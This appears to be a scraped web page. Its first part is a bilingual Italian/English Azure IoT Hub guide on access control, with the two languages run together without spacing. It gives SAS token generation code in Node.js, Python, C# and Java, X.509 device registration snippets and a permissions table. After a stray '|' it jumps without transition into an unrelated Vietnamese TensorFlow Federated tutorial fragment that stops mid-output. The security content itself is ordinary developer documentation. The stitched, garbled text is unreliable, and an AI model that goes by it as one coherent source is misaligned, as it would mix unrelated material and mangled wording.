{resourceURI}{resourceURI} Prefisso URI (per segmento) degli endpoint a cui è possibile accedere tramite questo token e che inizia con il nome host dell'hub IoT senza il protocollo.URI prefix (by segment) of the endpoints that can be accessed with this token, starting with host name of the IoT hub (no protocol). Ad esempio, usare myHub.azure-devices.net/devices/device1For example, myHub.azure-devices.net/devices/device1
{expiry}{expiry} Stringhe UTF8 per il numero di secondi trascorsi dalle 00:00:00 UTC dell'1 gennaio 1970.UTF8 strings for number of seconds since the epoch 00:00:00 UTC on 1 January 1970.
{URL-encoded-resourceURI}{URL-encoded-resourceURI} Codifica URL con lettere minuscole dell'URI della risorsa con lettere minuscoleLower case URL-encoding of the lower case resource URI
{policyName}{policyName} Nome del criterio di accesso condiviso a cui fa riferimento il token.The name of the shared access policy to which this token refers. Assente se il token fa riferimento a credenziali del registro dei dispositivi.Absent if the token refers to device-registry credentials.
Nota sul prefisso: il prefisso dell'URI viene calcolato in base al segmento e non in base al carattere.Note on prefix: The URI prefix is computed by segment and not by character. Ad esempio /a/b è un prefisso per /a/b/c ma non per /a/bc.For example /a/b is a prefix for /a/b/c but not for /a/bc.
Il frammento seguente di Node.js mostra una funzione denominata generateSasToken che calcola il token dagli input resourceUri, signingKey, policyName, expiresInMins.The following Node.js snippet shows a function called generateSasToken that computes the token from the inputs resourceUri, signingKey, policyName, expiresInMins. Nelle sezioni successive viene illustrato nel dettaglio come inizializzare gli input a seconda del caso d'uso.The next sections detail how to initialize the different inputs for the different token use cases.
var generateSasToken = function(resourceUri, signingKey, policyName, expiresInMins) {
resourceUri = encodeURIComponent(resourceUri);
// Set expiration in seconds
var expires = (Date.now() / 1000) + expiresInMins * 60;
expires = Math.ceil(expires);
var toSign = resourceUri + '\n' + expires;
// Use crypto
var hmac = crypto.createHmac('sha256', Buffer.from(signingKey, 'base64'));
hmac.update(toSign);
var base64UriEncoded = encodeURIComponent(hmac.digest('base64'));
// Construct authorization string
var token = "SharedAccessSignature sr=" + resourceUri + "&sig="
+ base64UriEncoded + "&se=" + expires;
if (policyName) token += "&skn="+policyName;
return token;
};
Per fare un confronto, l'equivalente in termini di codice Python per generare un token di sicurezza è:As a comparison, the equivalent Python code to generate a security token is:
from base64 import b64encode, b64decode
from hashlib import sha256
from time import time
from urllib import parse
from hmac import HMAC
def generate_sas_token(uri, key, policy_name, expiry=3600):
ttl = time() + expiry
sign_key = "%s\n%d" % ((parse.quote_plus(uri)), int(ttl))
print(sign_key)
signature = b64encode(HMAC(b64decode(key), sign_key.encode('utf-8'), sha256).digest())
rawtoken = {
'sr' : uri,
'sig': signature,
'se' : str(int(ttl))
}
if policy_name is not None:
rawtoken['skn'] = policy_name
return 'SharedAccessSignature ' + parse.urlencode(rawtoken)
La funzionalità di C# per generare un token di sicurezza è la seguente:The functionality in C# to generate a security token is:
using System;
using System.Globalization;
using System.Net;
using System.Net.Http;
using System.Security.Cryptography;
using System.Text;
public static string generateSasToken(string resourceUri, string key, string policyName, int expiryInSeconds = 3600)
{
TimeSpan fromEpochStart = DateTime.UtcNow - new DateTime(1970, 1, 1);
string expiry = Convert.ToString((int)fromEpochStart.TotalSeconds + expiryInSeconds);
string stringToSign = WebUtility.UrlEncode(resourceUri) + "\n" + expiry;
HMACSHA256 hmac = new HMACSHA256(Convert.FromBase64String(key));
string signature = Convert.ToBase64String(hmac.ComputeHash(Encoding.UTF8.GetBytes(stringToSign)));
string token = String.Format(CultureInfo.InvariantCulture, "SharedAccessSignature sr={0}&sig={1}&se={2}", WebUtility.UrlEncode(resourceUri), WebUtility.UrlEncode(signature), expiry);
if (!String.IsNullOrEmpty(policyName))
{
token += "&skn=" + policyName;
}
return token;
}
Per Java:For Java:
public static String generateSasToken(String resourceUri, String key) throws Exception {
// Token will expire in one hour
var expiry = Instant.now().getEpochSecond() + 3600;
String stringToSign = URLEncoder.encode(resourceUri, StandardCharsets.UTF_8) + "\n" + expiry;
byte[] decodedKey = Base64.getDecoder().decode(key);
Mac sha256HMAC = Mac.getInstance("HmacSHA256");
SecretKeySpec secretKey = new SecretKeySpec(decodedKey, "HmacSHA256");
sha256HMAC.init(secretKey);
Base64.Encoder encoder = Base64.getEncoder();
String signature = new String(encoder.encode(
sha256HMAC.doFinal(stringToSign.getBytes(StandardCharsets.UTF_8))), StandardCharsets.UTF_8);
String token = "SharedAccessSignature sr=" + URLEncoder.encode(resourceUri, StandardCharsets.UTF_8)
+ "&sig=" + URLEncoder.encode(signature, StandardCharsets.UTF_8.name()) + "&se=" + expiry;
return token;
}
Nota
Poiché la validità temporale del token viene verificata sui computer hub IoT, lo sfasamento dell'orologio del computer che genera il token deve essere minimo.Since the time validity of the token is validated on IoT Hub machines, the drift on the clock of the machine that generates the token must be minimal.
Usare i token di firma di accesso condiviso in un dispositivo clientUse SAS tokens in a device app
Esistono due modi per ottenere le autorizzazioni DeviceConnect con l'hub IoT con i token di sicurezza: usare una chiave del dispositivo simmetrica dal registro delle identità oppure usare una chiave di accesso condiviso.There are two ways to obtain DeviceConnect permissions with IoT Hub with security tokens: use a symmetric device key from the identity registry, or use a shared access key.
Tenere presente che, per impostazione predefinita, tutte le funzionalità accessibili dai dispositivi vengono esposte negli endpoint con il prefisso /devices/{deviceId}.Remember that all functionality accessible from devices is exposed by design on endpoints with prefix /devices/{deviceId}.
Importante
L'unico modo di cui dispone l'hub IoT per autenticare un dispositivo specifico è tramite la chiave simmetrica identità dispositivo.The only way that IoT Hub authenticates a specific device is using the device identity symmetric key. Nei casi in cui si acceda alle funzionalità del dispositivo tramite criteri di accesso condiviso, la soluzione deve considerare il componente che emette il token di sicurezza come sottocomponente attendibile.In cases when a shared access policy is used to access device functionality, the solution must consider the component issuing the security token as a trusted subcomponent.
Gli endpoint per il dispositivo sono, indipendentemente dal protocollo:The device-facing endpoints are (irrespective of the protocol):
EndpointEndpoint FunzionalitàFunctionality
{iot hub host name}/devices/{deviceId}/messages/events Invio di messaggi da dispositivo a cloud.Send device-to-cloud messages.
{iot hub host name}/devices/{deviceId}/messages/devicebound Ricezione di messaggi da cloud a dispositivo.Receive cloud-to-device messages.
Usare una chiave simmetrica nel registro identitàUse a symmetric key in the identity registry
Quando si usa una chiave simmetrica dell'identità del dispositivo per generare un token, l'elemento policyName (skn) del token viene omesso.When using a device identity's symmetric key to generate a token, the policyName (skn) element of the token is omitted.
Ad esempio, un token creato per accedere a tutte le funzionalità del dispositivo deve avere i seguenti parametri:For example, a token created to access all device functionality should have the following parameters:
URI della risorsa: {IoT hub name}.azure-devices.net/devices/{device id},resource URI:{IoT hub name}.azure-devices.net/devices/{device id},
Chiave di firma: qualsiasi chiave simmetrica per l'identità {device id},signing key: any symmetric key for the{device id}identity,
Nessun nome di criterio,no policy name,
Qualsiasi ora di scadenza.any expiration time.
Un esempio di uso della funzione di Node.js precedente sarebbe il seguente:An example using the preceding Node.js function would be:
var endpoint ="myhub.azure-devices.net/devices/device1";
var deviceKey ="...";
var token = generateSasToken(endpoint, deviceKey, null, 60);
Il risultato, che concede l'accesso a tutte le funzionalità per device1, sarà:The result, which grants access to all functionality for device1, would be:
SharedAccessSignature sr=myhub.azure-devices.net%2fdevices%2fdevice1&sig=13y8ejUk2z7PLmvtwR5RqlGBOVwiq7rQR3WZ5xZX3N4%3D&se=1456971697
Nota
è possibile generare un token di firma di accesso condiviso con il comando di estensione dell'interfaccia della riga di comando az iot hub generate-sas-token o con Azure IoT Tools per Visual Studio Code.It's possible to generate a SAS token with the CLI extension command az iot hub generate-sas-token, or the Azure IoT Tools for Visual Studio Code.
Usare criteri di accesso condivisoUse a shared access policy
Quando si crea un token da criteri di accesso condiviso, impostare il campo skn sul nome dei criteri.When you create a token from a shared access policy, set the skn field to the name of the policy. Questi criteri devono concedere l'autorizzazione DeviceConnect.This policy must grant the DeviceConnect permission.
I due scenari principali per l'uso di criteri di accesso condiviso per accedere alla funzionalità dei dispositivi sono:The two main scenarios for using shared access policies to access device functionality are:
gateway del protocollo cloud,cloud protocol gateways,
servizi token tramite i quali implementare schemi di autenticazione personalizzati.token services used to implement custom authentication schemes.
Poiché i criteri di accesso condiviso possono potenzialmente autorizzare la connessione a qualsiasi dispositivo, in fase di creazione dei token di sicurezza è importante usare l'URI risorsa corretto.Since the shared access policy can potentially grant access to connect as any device, it is important to use the correct resource URI when creating security tokens. Questa impostazione è particolarmente importante per i servizi token, che devono limitare l'ambito del token a un dispositivo specifico usando l'URI risorsa.This setting is especially important for token services, which have to scope the token to a specific device using the resource URI. Questo punto è meno importante per i gateway di protocollo, in quanto già filtrano il traffico per tutti i dispositivi.This point is less relevant for protocol gateways as they are already mediating traffic for all devices.
Ad esempio, un servizio token che usa il criterio di accesso condiviso già esistente denominato device creerebbe un token con i parametri seguenti:As an example, a token service using the pre-created shared access policy called device would create a token with the following parameters:
URI della risorsa: {IoT hub name}.azure-devices.net/devices/{device id},resource URI:{IoT hub name}.azure-devices.net/devices/{device id},
chiave di firma: una delle chiavi del criterio device,signing key: one of the keys of thedevicepolicy,
nome criterio: device,policy name:device,
Qualsiasi ora di scadenza.any expiration time.
Un esempio di uso della funzione di Node.js precedente sarebbe il seguente:An example using the preceding Node.js function would be:
var endpoint ="myhub.azure-devices.net/devices/device1";
var policyName = 'device';
var policyKey = '...';
var token = generateSasToken(endpoint, policyKey, policyName, 60);
Il risultato, che concede l'accesso a tutte le funzionalità per device1, sarà:The result, which grants access to all functionality for device1, would be:
SharedAccessSignature sr=myhub.azure-devices.net%2fdevices%2fdevice1&sig=13y8ejUk2z7PLmvtwR5RqlGBOVwiq7rQR3WZ5xZX3N4%3D&se=1456971697&skn=device
Un gateway di protocollo potrebbe usare lo stesso token per tutti i dispositivi semplicemente impostando l'URI della risorsa su myhub.azure-devices.net/devices.A protocol gateway could use the same token for all devices simply setting the resource URI to myhub.azure-devices.net/devices.
Usare token di sicurezza da componenti del servizioUse security tokens from service components
I componenti del servizio possono generare token di sicurezza solo usando criteri di accesso condiviso che concedono le autorizzazioni appropriate, come illustrato prima.Service components can only generate security tokens using shared access policies granting the appropriate permissions as explained previously.
Di seguito vengono indicate le funzioni del servizio esposte sugli endpoint:Here are the service functions exposed on the endpoints:
EndpointEndpoint FunzionalitàFunctionality
{iot hub host name}/devices Creazione, aggiornamento, recupero ed eliminazione delle identità dispositivo.Create, update, retrieve, and delete device identities.
{iot hub host name}/messages/events Ricezione di messaggi da dispositivo a cloud.Receive device-to-cloud messages.
{iot hub host name}/servicebound/feedback Ricezione di feedback per messaggi da cloud a dispositivo.Receive feedback for cloud-to-device messages.
{iot hub host name}/devicebound Invio di messaggi da cloud a dispositivo.Send cloud-to-device messages.
Ad esempio, un servizio che usa il criterio di accesso condiviso già esistente denominato registryRead creerebbe un token con i parametri seguenti:As an example, a service generating using the pre-created shared access policy called registryRead would create a token with the following parameters:
URI della risorsa: {IoT hub name}.azure-devices.net/devices,resource URI:{IoT hub name}.azure-devices.net/devices,
chiave di firma: una delle chiavi del criterio registryRead,signing key: one of the keys of theregistryReadpolicy,
nome criterio: registryRead,policy name:registryRead,
Qualsiasi ora di scadenza.any expiration time.
var endpoint ="myhub.azure-devices.net/devices";
var policyName = 'registryRead';
var policyKey = '...';
var token = generateSasToken(endpoint, policyKey, policyName, 60);
Il risultato, che concede l'accesso in lettura a tutte le identità dispositivo, sarà:The result, which would grant access to read all device identities, would be:
SharedAccessSignature sr=myhub.azure-devices.net%2fdevices&sig=JdyscqTpXdEJs49elIUCcohw2DlFDR3zfH5KqGJo4r4%3D&se=1456973447&skn=registryRead
Certificati X.509 supportatiSupported X.509 certificates
È possibile usare qualsiasi certificato X.509 per autenticare un dispositivo con l'hub IoT caricando un'identificazione personale del certificato o un'autorità di certificazione (CA) nell'hub IoT di Azure.You can use any X.509 certificate to authenticate a device with IoT Hub by uploading either a certificate thumbprint or a certificate authority (CA) to Azure IoT Hub. L'autenticazione tramite identificazioni personali del certificato verifica che l'identificazione personale presentata corrisponda all'identificazione personale configurata.Authentication using certificate thumbprints verifies that the presented thumbprint matches the configured thumbprint. L'autenticazione tramite l'autorità di certificazione convalida la catena di certificati.Authentication using certificate authority validates the certificate chain. In entrambi i casi, l'handshake TLS richiede che il dispositivo disponga di un certificato e di una chiave privata validi.Either way, TLS handshake requires the device to have a valid certificate and private key. Per informazioni dettagliate, vedere la specifica TLS, ad esempio: RFC 5246 - Protocollo Transport Layer Security (TLS) versione1.2.Refer to the TLS specification for details, for example: RFC 5246 - The Transport Layer Security (TLS) Protocol Version 1.2.
I certificati supportati includono:Supported certificates include:
Un certificato X.509 esistente.An existing X.509 certificate. Un dispositivo potrebbe già avere un certificato X.509 associato.A device may already have an X.509 certificate associated with it. Il dispositivo può usare questo certificato per autenticarsi con hub IoT.The device can use this certificate to authenticate with IoT Hub. È compatibile sia con l'autenticazione tramite identificazione personale che con l'autenticazione tramite autorità di certificazione.Works with either thumbprint or CA authentication.
Certificato X.509 firmato da un'autorità di certificazione.CA-signed X.509 certificate. Per identificare un dispositivo e autenticarlo con l'hub IoT, è possibile usare un certificato X.509 generato e firmato da un'autorità di certificazione (CA).To identify a device and authenticate it with IoT Hub, you can use an X.509 certificate generated and signed by a Certification Authority (CA). È compatibile sia con l'autenticazione tramite identificazione personale che con l'autenticazione tramite autorità di certificazione.Works with either thumbprint or CA authentication.
Un certificato X-509 auto-generato e auto-firmato.A self-generated and self-signed X-509 certificate. Un produttore di dispositivi o un distributore interno può generare questi certificati e archiviare la chiave privata corrispondente (e il certificato) nel dispositivo.A device manufacturer or in-house deployer can generate these certificates and store the corresponding private key (and certificate) on the device. È possibile usare strumenti come OpenSSL e l'utilità Windows SelfSignedCertificate per questo scopo.You can use tools such as OpenSSL and Windows SelfSignedCertificate utility for this purpose. È compatibile solo con l'autenticazione tramite identificazione personale.Only works with thumbprint authentication.
Un dispositivo può usare un certificato X.509 o un token di sicurezza per l'autenticazione, ma non per entrambi.A device may either use an X.509 certificate or a security token for authentication, but not both. Con l'autenticazione del certificato X. 509, assicurarsi di disporre di una strategia per gestire il rollover del certificato quando un certificato esistente scade.With X.509 certificate authentication, make sure you have a strategy in place to handle certificate rollover when an existing certificate expires.
Le funzionalità seguenti non sono supportate per i dispositivi che usano l'autenticazione della CA X. 509:The following functionality is not supported for devices that use X.509 CA authentication:
HTTPS, MQTT su WebSocket e AMQP su protocolli WebSocket.HTTPS, MQTT over WebSockets, and AMQP over WebSockets protocols.
Caricamenti di file (tutti i protocolli).File uploads (all protocols).
Per altre informazioni sull'autenticazione tramite l'autorità di certificazione, vedere Autenticazione dei dispositivi con i certificati della CA X.509.For more information about authentication using certificate authority, see Device Authentication using X.509 CA Certificates. Per informazioni su come caricare e verificare un'autorità di certificazione con l'hub Internet delle cose, vedere configurare la sicurezza X. 509 nell'hub Azure.For information about how to upload and verify a certificate authority with your IoT hub, see Set up X.509 security in your Azure IoT hub.
Registrare un certificato X.509 per un dispositivoRegister an X.509 certificate for a device
Il componente Azure IoT SDK per servizi per C# (versione 1.0.8+) supporta la registrazione di un dispositivo che usa un certificato X.509 per l'autenticazione.The Azure IoT Service SDK for C# (version 1.0.8+) supports registering a device that uses an X.509 certificate for authentication. Anche altre API come quelle per l'importazione e l'esportazione dei dispositivi supportano i certificati X.509.Other APIs such as import/export of devices also support X.509 certificates.
È anche possibile usare il comando di estensione dell'interfaccia della riga di comando az iot hub device-identity per configurare i certificati X.509 per i dispositivi.You can also use the CLI extension command az iot hub device-identity to configure X.509 certificates for devices.
Supporto per C#C# Support
La classe RegistryManager offre un modo di registrare un dispositivo a livello di codice.The RegistryManager class provides a programmatic way to register a device. In particolare, i metodi AddDeviceAsync e UpdateDeviceAsync consentono di registrare e aggiornare un dispositivo nel registro delle identità dell'hub IoT.In particular, the AddDeviceAsync and UpdateDeviceAsync methods enable you to register and update a device in the IoT Hub identity registry. Questi due metodi accettano un'istanza Device come input.These two methods take a Device instance as input. La classe Device include una proprietà Authentication che consente di specificare le identificazioni primarie e secondarie del certificato X.509.The Device class includes an Authentication property that allows you to specify primary and secondary X.509 certificate thumbprints. L'identificazione personale rappresenta un hash SHA256 del certificato X.509 archiviato usando la codifica DER binaria.The thumbprint represents a SHA256 hash of the X.509 certificate (stored using binary DER encoding). Gli utenti hanno la possibilità di specificare un'identificazione personale primaria, una secondaria o entrambe.You have the option of specifying a primary thumbprint or a secondary thumbprint or both. Le identificazioni personali primarie e secondarie sono supportate per gestire scenari di rollover dei certificati.Primary and secondary thumbprints are supported to handle certificate rollover scenarios.
Ecco un frammento di codice C# di esempio per registrare un dispositivo usando l'identificazione personale di un certificato X.509:Here is a sample C# code snippet to register a device using an X.509 certificate thumbprint:
var device = new Device(deviceId)
{
Authentication = new AuthenticationMechanism()
{
X509Thumbprint = new X509Thumbprint()
{
PrimaryThumbprint = "B4172AB44C28F3B9E117648C6F7294978A00CDCBA34A46A1B8588B3F7D82C4F1"
}
}
};
RegistryManager registryManager = RegistryManager.CreateFromConnectionString(deviceGatewayConnectionString);
await registryManager.AddDeviceAsync(device);
Usare un certificato X.509 durante le operazioni di runtimeUse an X.509 certificate during run-time operations
Supporto per C#C# Support
La classe DeviceAuthenticationWithX509Certificate supporta la creazione di istanze di DeviceClient usando un certificato X.509.The class DeviceAuthenticationWithX509Certificate supports the creation of DeviceClient instances using an X.509 certificate. Il certificato X.509 deve essere nel formato PFX, denominato anche PKCS #12, che include la chiave privata.The X.509 certificate must be in the PFX (also called PKCS #12) format that includes the private key.
Di seguito è riportato un frammento di codice di esempio:Here is a sample code snippet:
var authMethod = new DeviceAuthenticationWithX509Certificate("<device id>", x509Certificate);
var deviceClient = DeviceClient.Create("<IotHub DNS HostName>", authMethod);
Autenticazione personalizzata di dispositivi e moduliCustom device and module authentication
È possibile usare il registro delle identità dell'hub IoT per configurare il controllo dell'accesso e le credenziali di sicurezza per ogni dispositivo/modulo usando i token.You can use the IoT Hub identity registry to configure per-device/module security credentials and access control using tokens. Se una soluzione IoT ha già un registro personalizzato delle identità e/o uno schema di autenticazione, valutare la possibilità di creare un servizio token per integrare l'infrastruttura con l'hub IoT.If an IoT solution already has a custom identity registry and/or authentication scheme, consider creating a token service to integrate this infrastructure with IoT Hub. In questo modo, è possibile usare altre funzionalità IoT nella soluzione.In this way, you can use other IoT features in your solution.
Un servizio token è un servizio cloud personalizzato.A token service is a custom cloud service. Usa i criteri di accesso condiviso dell'hub IoT con autorizzazioni DeviceConnect o ModuleConnect per creare token basati sul dispositivo o basati sul modulo.It uses an IoT Hub shared access policy with DeviceConnect or ModuleConnect permissions to create device-scoped or module-scoped tokens. Questi token abilitano la connessione di un dispositivo e un modulo all'hub IoT.These tokens enable a device and module to connect to your IoT hub.
Di seguito vengono indicati i passaggi principali del modello del servizio token:Here are the main steps of the token service pattern:
Creare i criteri di accesso condiviso dell'hub IoT con autorizzazioni
DeviceConnectoModuleConnectper l'hub IoT.Create an IoT Hub shared access policy withDeviceConnectorModuleConnectpermissions for your IoT hub. È possibile creare questi criteri nel portale di Azure o a livello di programmazione.You can create this policy in the Azure portal or programmatically. Il servizio token usa questi criteri per firmare i token creati.The token service uses this policy to sign the tokens it creates.
Quando un dispositivo/modulo deve accedere all'hub IoT, richiede un token firmato dal servizio token.When a device/module needs to access your IoT hub, it requests a signed token from your token service. Il dispositivo può eseguire l'autenticazione con il registro delle identità personalizzato/lo schema di autenticazione per determinare l'identità del dispositivo/modulo usata dal servizio token per creare il token.The device can authenticate with your custom identity registry/authentication scheme to determine the device/module identity that the token service uses to create the token.
Il servizio token restituisce un token.The token service returns a token. Il token viene creato tramite
/devices/{deviceId}o/devices/{deviceId}/module/{moduleId}comeresourceURI, condeviceIdcome dispositivo da autenticare omoduleIdcome modulo da autenticare.The token is created by using/devices/{deviceId}or/devices/{deviceId}/module/{moduleId}asresourceURI, withdeviceIdas the device being authenticated ormoduleIdas the module being authenticated. Il servizio token usa i criteri di accesso condivisi per costruire il token.The token service uses the shared access policy to construct the token.
Il dispositivo/modulo usa il token direttamente con l'hub IoT.The device/module uses the token directly with the IoT hub.
Nota
È possibile usare la classe .NET SharedAccessSignatureBuilder o la classe Java IotHubServiceSasToken per creare un token nel servizio token.You can use the .NET class SharedAccessSignatureBuilder or the Java class IotHubServiceSasToken to create a token in your token service.
Il servizio token può impostare la scadenza del token, in base alle esigenze.The token service can set the token expiration as desired. Quando il token scade, l'hub IoT interrompe la connessione del dispositivo/modulo.When the token expires, the IoT hub severs the device/module connection. Il dispositivo/modulo deve quindi richiedere un nuovo token dal servizio token.Then, the device/module must request a new token from the token service. Un intervallo di scadenza breve aumenta il carico sia sul dispositivo/modulo che sul servizio token.A short expiry time increases the load on both the device/module and the token service.
Perché un dispositivo/modulo si connetta all'hub, è comunque necessario aggiungerlo al registro delle identità dell'hub IoT anche se il dispositivo/modulo usa un token e non una chiave per la connessione.For a device/module to connect to your hub, you must still add it to the IoT Hub identity registry — even though it is using a token and not a key to connect. È quindi possibile continuare a usare il controllo dell'accesso per ogni dispositivo/modulo abilitando o disabilitando le identità dei dispositivi/moduli nel registro delle identità.Therefore, you can continue to use per-device/per-module access control by enabling or disabling device/module identities in the identity registry. In questo modo si riduce il rischio che vengano usati token con intervalli di scadenza prolungati.This approach mitigates the risks of using tokens with long expiry times.
Confronto con un gateway personalizzatoComparison with a custom gateway
Il modello di servizio token è il metodo consigliato per implementare uno schema di autenticazione/registro di identità personalizzato con l'hub IoT.The token service pattern is the recommended way to implement a custom identity registry/authentication scheme with IoT Hub. Questo schema è consigliato perché l'hub IoT continua a gestire la maggior parte del traffico della soluzione.This pattern is recommended because IoT Hub continues to handle most of the solution traffic. Tuttavia, se lo schema di autenticazione personalizzato è molto legato al protocollo, può essere necessario un gateway personalizzato per elaborare tutto il traffico.However, if the custom authentication scheme is so intertwined with the protocol, you may require a custom gateway to process all the traffic. Un esempio di tale scenario prevede l'uso del protocollo TLS (Transport Layer Security) e di chiavi precondivise.An example of such a scenario is using Transport Layer Security (TLS) and pre-shared keys (PSKs). Per altre informazioni, vedere l'articolo relativo al gateway del protocollo.For more information, see the protocol gateway article.
Argomenti di riferimento:Reference topics:
Gli argomenti di riferimento seguenti offrono altre informazioni sul controllo dell'accesso all'hub IoT.The following reference topics provide you with more information about controlling access to your IoT hub.
Autorizzazioni per l'hub IoTIoT Hub permissions
La tabella seguente elenca le autorizzazioni che è possibile usare per controllare l'accesso all'hub IoT.The following table lists the permissions you can use to control access to your IoT hub.
AutorizzazionePermission NoteNotes
RegistryReadRegistryRead Concede l'accesso di sola lettura al registro di identità.Grants read access to the identity registry. Per altre informazioni, vedere Registro delle identità.For more information, see Identity registry.
Questa autorizzazione viene usata dai servizi cloud back-end.This permission is used by back-end cloud services.
RegistryReadWriteRegistryReadWrite Concede l'accesso di lettura e scrittura al registro di identità.Grants read and write access to the identity registry. Per altre informazioni, vedere Registro delle identità.For more information, see Identity registry.
Questa autorizzazione viene usata dai servizi cloud back-end.This permission is used by back-end cloud services.
ServiceConnectServiceConnect Concede l'accesso alle comunicazioni per il servizio cloud e al monitoraggio degli endpoint.Grants access to cloud service-facing communication and monitoring endpoints.
Concede l'autorizzazione per la ricezione di messaggi da dispositivo a cloud, l'invio di messaggi da cloud a dispositivo e il recupero degli acknowledgment di recapito corrispondenti.Grants permission to receive device-to-cloud messages, send cloud-to-device messages, and retrieve the corresponding delivery acknowledgments.
Concede l'autorizzazione per il recupero degli acknowledgement di recapito per caricamenti di file.Grants permission to retrieve delivery acknowledgments for file uploads.
Concede l'autorizzazione per l'accesso a dispositivi/moduli gemelli per l'aggiornamento dei tag e delle proprietà indicate, il recupero delle proprietà segnalate e l'esecuzione di query.Grants permission to access twins to update tags and desired properties, retrieve reported properties, and run queries.
Questa autorizzazione viene usata dai servizi cloud back-end.This permission is used by back-end cloud services.
DeviceConnectDeviceConnect Concede l'accesso agli endpoint per il dispositivo.Grants access to device-facing endpoints.
Concede l'autorizzazione per l'invio di messaggi da dispositivo a cloud e la ricezione di messaggi da cloud a dispositivo.Grants permission to send device-to-cloud messages and receive cloud-to-device messages.
Concede l'autorizzazione per il caricamento di file da un dispositivo.Grants permission to perform file upload from a device.
Concede l'autorizzazione per la ricezione di notifiche su particolari proprietà del dispositivo gemello e l'aggiornamento delle proprietà segnalate di quest'ultimo.Grants permission to receive device twin desired property notifications and update device twin reported properties.
Concede l'autorizzazione per il caricamento di file.Grants permission to perform file uploads.
Questa autorizzazione viene usata dai dispositivi.This permission is used by devices.
Materiale di riferimentoAdditional reference material
Di seguito sono indicati altri argomenti di riferimento reperibili nella Guida per gli sviluppatori dell'hub IoT:Other reference topics in the IoT Hub developer guide include:
Endpoint dell'hub IoT illustra i diversi endpoint esposti da ogni hub IoT per operazioni della fase di esecuzione e di gestione.IoT Hub endpoints describes the various endpoints that each IoT hub exposes for run-time and management operations.
Quote e limitazioni descrive le quote e i comportamenti di limitazione applicabili al servizio hub IoT.Throttling and quotas describes the quotas and throttling behaviors that apply to the IoT Hub service.
Azure IoT SDK per dispositivi e servizi elenca gli SDK nei diversi linguaggi che è possibile usare quando si sviluppano app per dispositivi e servizi che interagiscono con l'hub IoT.Azure IoT device and service SDKs lists the various language SDKs you can use when you develop both device and service apps that interact with IoT Hub.
Linguaggio di query dell'hub IoT descrive il linguaggio di query che è possibile usare per recuperare informazioni dall'hub IoT sui dispositivi gemelli e sui processi.IoT Hub query language describes the query language you can use to retrieve information from IoT Hub about your device twins and jobs.
RFC 5246 - Il protocollo Transport Layer Security (TLS) versione 1.2 offre altre informazioni sull'autenticazione TLS.RFC 5246 - The Transport Layer Security (TLS) Protocol Version 1.2 provides more information about TLS authentication.
Passaggi successiviNext steps
In questa esercitazione si è appreso come controllare l'accesso all'hub IoT. Altri argomenti di interesse disponibili nella Guida per sviluppatori sono i seguenti:Now that you have learned how to control access IoT Hub, you may be interested in the following IoT Hub developer guide topics:
Use device twins to synchronize state and configurations (Usare dispositivi gemelli per sincronizzare lo stato e le configurazioni)Use device twins to synchronize state and configurations
Richiamare un metodo diretto in un dispositivoInvoke a direct method on a device
Pianificare processi in più dispositiviSchedule jobs on multiple devices
Per provare alcuni dei concetti descritti in questo articolo, vedere le esercitazioni sull'hub IoT seguenti:If you would like to try out some of the concepts described in this article, see the following IoT Hub tutorials:
|
Xem trên TensorFlow.org Chạy trong Google Colab Xem nguồn trên GitHub
Trong hướng dẫn này, chúng tôi sử dụng ví dụ đào tạo MNIST cổ điển để giới thiệu lớp API Học liên kết (FL) của TFF, tff.learning - một tập hợp các giao diện cấp cao hơn có thể được sử dụng để thực hiện các loại nhiệm vụ học liên kết phổ biến, chẳng hạn như đào tạo liên kết, chống lại các mô hình do người dùng cung cấp được triển khai trong TensorFlow.
Hướng dẫn này và API học tập liên kết, chủ yếu dành cho những người dùng muốn kết hợp các mô hình TensorFlow của riêng họ vào TFF, coi mô hình sau chủ yếu là một hộp đen. Để hiểu sâu hơn về TFF và cách triển khai các thuật toán học liên kết của riêng bạn, hãy xem hướng dẫn về FC Core API - Thuật toán liên kết tùy chỉnh Phần 1 và Phần 2 .
Để biết thêm về tff.learning , hãy tiếp tục với Học liên kết để tạo văn bản , hướng dẫn ngoài việc bao gồm các mô hình lặp lại, còn trình bày việc tải mô hình Keras tuần tự được đào tạo trước để tinh chỉnh với học liên kết kết hợp với đánh giá bằng Keras.
Trước khi chúng ta bắt đầu
Trước khi chúng tôi bắt đầu, hãy chạy phần sau để đảm bảo rằng môi trường của bạn được thiết lập chính xác. Nếu bạn không thấy lời chào, vui lòng tham khảo Hướng dẫn cài đặt để được hướng dẫn.
# tensorflow_federated_nightly also bring in tf_nightly, which
# can causes a duplicate tensorboard install, leading to errors.
!pip uninstall --yes tensorboard tb-nightly
!pip install --quiet --upgrade tensorflow_federated_nightly
!pip install --quiet --upgrade nest_asyncio
!pip install --quiet tb-nightly # or tensorboard, but not both
import nest_asyncio
nest_asyncio.apply()
%load_ext tensorboard
Fetching TensorBoard MPM... done.
import collections
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
np.random.seed(0)
tff.federated_computation(lambda: 'Hello, World!')()
b'Hello, World!'
Chuẩn bị dữ liệu đầu vào
Hãy bắt đầu với dữ liệu. Học liên kết yêu cầu tập dữ liệu được liên kết, tức là tập hợp dữ liệu từ nhiều người dùng. Dữ liệu Federated thường không iid , trong đó đặt ra một bộ duy nhất của những thách thức.
Để tạo điều kiện thuận lợi cho quá trình thử nghiệm, chúng tôi đã đưa vào kho lưu trữ TFF một số bộ dữ liệu, bao gồm phiên bản liên kết của MNIST có chứa phiên bản của bộ dữ liệu NIST gốc đã được xử lý lại bằng cách sử dụng Leaf để dữ liệu được người viết ban đầu của các chữ số. Vì mỗi người viết có một phong cách riêng, tập dữ liệu này thể hiện loại hành vi không ổn định như mong đợi của các tập dữ liệu liên kết.
Đây là cách chúng tôi có thể tải nó.
emnist_train, emnist_test = tff.simulation.datasets.emnist.load_data()
Các tập dữ liệu được trả về bởi load_data() là các thể hiện của tff.simulation.ClientData , một giao diện cho phép bạn liệt kê nhóm người dùng, để tạo mộttf.data.Dataset đại diện cho dữ liệu của một người dùng cụ thể và để truy vấn cấu trúc của các phần tử riêng lẻ. Đây là cách bạn có thể sử dụng giao diện này để khám phá nội dung của tập dữ liệu. Hãy nhớ rằng mặc dù giao diện này cho phép bạn lặp lại các id máy khách, nhưng đây chỉ là một tính năng của dữ liệu mô phỏng. Như bạn sẽ thấy ngay sau đây, danh tính khách hàng không được sử dụng bởi khung học tập liên hợp - mục đích duy nhất của chúng là cho phép bạn chọn các tập hợp con của dữ liệu để mô phỏng.
len(emnist_train.client_ids)
3383
emnist_train.element_type_structure
